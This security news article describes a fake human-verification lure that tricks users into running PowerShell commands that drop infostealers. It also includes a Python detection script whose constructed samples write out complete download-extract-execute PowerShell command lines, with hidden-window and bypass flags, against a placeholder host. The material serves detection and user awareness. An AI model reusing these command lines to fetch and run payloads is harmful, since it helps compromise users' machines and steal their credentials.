Beware: Fake ‘Verify You’re Human’ Requests Spreading Malware

In two separate incidents, Secureworks researchers identified victims who were unwittingly redirected to malicious websites after running Google searches for popular video streaming services.

One victim was browsing for sports streaming sites, while the other was searching for a movie. Both were then lured into a fraudulent "verify you're human" flow that, once completed, resulted in a malicious PowerShell command being executed on their machine.

The PowerShell command extracts a malicious ZIP archive into the victim's temporary folder and runs the contents. That payload kicks off a chain of further actions, including dropping and launching a renamed BitTorrent client and a legitimate Windows utility, which further compromise the victim's system.

The researchers also found that in some cases the malware went on to deploy infostealers such as Vidar and StealC, giving the attackers the ability to harvest credentials and other sensitive data from the compromised system.

Fraudulent human verification steps

The attack does not exploit a software vulnerability. It relies on the victim copying the command from the fake verification page and running it themselves, which sidesteps the browser's download and execution protections entirely; the code then runs with whatever privileges the logged-on user has, which makes it a significant threat despite the absence of an exploit.

Secureworks also noted that controls it had previously used to mitigate similar attacks in the Middle East and Australia were effective in blocking later attempts against organizations in France and other regions.

Those earlier attacks, often disguised as legitimate services such as GitHub, aimed to deploy malware like LummaC2 for data theft. The overlap highlights the global reach of this campaign and the value of sharing threat intelligence and proven controls between organizations worldwide.

Encoded PowerShell command execution.
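An encoded PowerShell command line is the artefact a defender actually sees in process-creation telemetry, so a worked check belongs here. The following Python triage routine is an added example written for this page, not code from Secureworks or from the article. It decodes the base64/UTF-16LE payload behind -e/-enc/-EncodedCommand, then scores the script for the chain described above (download, write under %TEMP%, expand an archive, launch the result, plus hidden-window or execution-policy-bypass flags). The sample command lines, host names, file names and indicator regexes are all constructed assumptions for illustration; they are not a vendor rule set and not campaign indicators.

```python
"""Triage PowerShell process-creation command lines for the fake-verification
download-expand-execute chain. Added example on constructed data; the regexes
and thresholds are assumptions, not a published detection rule."""
import base64
import re

# Flags that carry a base64(UTF-16LE) script as the next argument.
ENC_FLAG = re.compile(r"^-(e|ec|enc|encodedcommand)$", re.IGNORECASE)
# Flags the lure typically adds so the victim sees nothing and policy does not interfere.
HIDING = re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass",
                    re.IGNORECASE)

# One indicator per link of the chain. Hits are counted; order is not required.
INDICATORS = {
    "download": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer|"
        r"DownloadFile|DownloadString)\b", re.IGNORECASE),
    "temp_path": re.compile(r"\$env:TEMP|%TEMP%|\\AppData\\Local\\Temp", re.IGNORECASE),
    "archive_extract": re.compile(r"\bExpand-Archive\b|ExtractToDirectory", re.IGNORECASE),
    "execute": re.compile(r"\b(Start-Process|Invoke-Expression|iex|Invoke-Item)\b",
                          re.IGNORECASE),
}
SUSPICIOUS_SCORE = 3  # assumed threshold: three or more links of the chain


def encode_ps(script: str) -> str:
    """Produce what PowerShell's -EncodedCommand expects: UTF-16LE text, base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if an -e/-enc/-EncodedCommand flag is present, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENC_FLAG.match(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # malformed payload: not decodable, leave to manual review
    return None


def analyze(cmdline: str) -> dict:
    """Score one command line; scan the decoded script, or everything after the binary."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline.split(None, 1)[-1]
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(script))
    hidden = bool(HIDING.search(cmdline))
    score = len(hits) + (1 if hidden else 0)
    return {
        "encoded": decoded is not None,
        "script": script,
        "indicators": hits,
        "hidden_or_bypass": hidden,
        "score": score,
        "verdict": "suspicious" if score >= SUSPICIOUS_SCORE else "benign",
    }


# Constructed samples (not real campaign data). Hosts use the reserved .invalid TLD.
LURE_SCRIPT = ("Invoke-WebRequest 'http://example.invalid/verify.zip' -OutFile $env:TEMP\\v.zip; "
               "Expand-Archive $env:TEMP\\v.zip -DestinationPath $env:TEMP\\v -Force; "
               "Start-Process $env:TEMP\\v\\client.exe")
ADMIN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\reports\\svc.csv"

SAMPLE_COMMAND_LINES = {
    "lure_encoded": "powershell.exe -w hidden -ep bypass -enc " + encode_ps(LURE_SCRIPT),
    "lure_plain": ('powershell.exe -WindowStyle Hidden -c "iwr http://example.invalid/a.zip '
                   '-OutFile $env:TEMP\\a.zip; Expand-Archive $env:TEMP\\a.zip $env:TEMP\\a; '
                   'iex $env:TEMP\\a\\run.ps1"'),
    "admin_encoded": "powershell.exe -NoProfile -EncodedCommand " + encode_ps(ADMIN_SCRIPT),
    "admin_plain": 'powershell.exe -Command "Get-Date; Get-Process | Sort-Object CPU"',
}


def triage(samples=SAMPLE_COMMAND_LINES) -> dict:
    """Map each sample name to its verdict."""
    return {name: analyze(cmd)["verdict"] for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMAND_LINES.items():
        r = analyze(cmd)
        print(f"{name:14s} {r['verdict']:10s} score={r['score']} indicators={r['indicators']}")
```

Note that an encoded command is not suspicious on its own: the admin_encoded sample decodes cleanly and scores zero. What separates the lure is the chain, so the score is built from the decoded content rather than from the mere presence of -EncodedCommand, and a plain -Command invocation of the same chain is caught the same way.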

In 2023, the researchers warned of the rising threat posed by infostealers, malicious software designed to steal sensitive information. In 2024, a fake human verification prompt was used to trick victims into exposing their credentials, which were promptly offered for sale on Russian Market, an underground marketplace known for trading stolen data.

How quickly the stolen data was put up for sale underlines the urgency of the infostealer threat and the need for robust controls against it.

Secureworks recommends that organizations implement strict policies preventing employees from accessing streaming services and other risky content on corporate systems. Regular social engineering training that incorporates current threat intelligence on the latest techniques is essential to educating employees about these scams. That training should make one point explicit: no legitimate human-verification page asks the user to copy and run a command, so any such prompt should be reported rather than followed.

Additionally, routing traffic through web proxies that block access to known-malicious or uncategorized pages significantly reduces the chance that a user reaches the lure in the first place. Combining these controls gives organizations a more secure and compliant environment.

Secureworks also advises customers to use security controls that block known-malicious URLs, and to treat unfamiliar URLs with caution, verifying them before opening them in a browser.

Kaaviya (https://cyberpress.org/)
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She covers cyber security incidents happening in cyberspace.
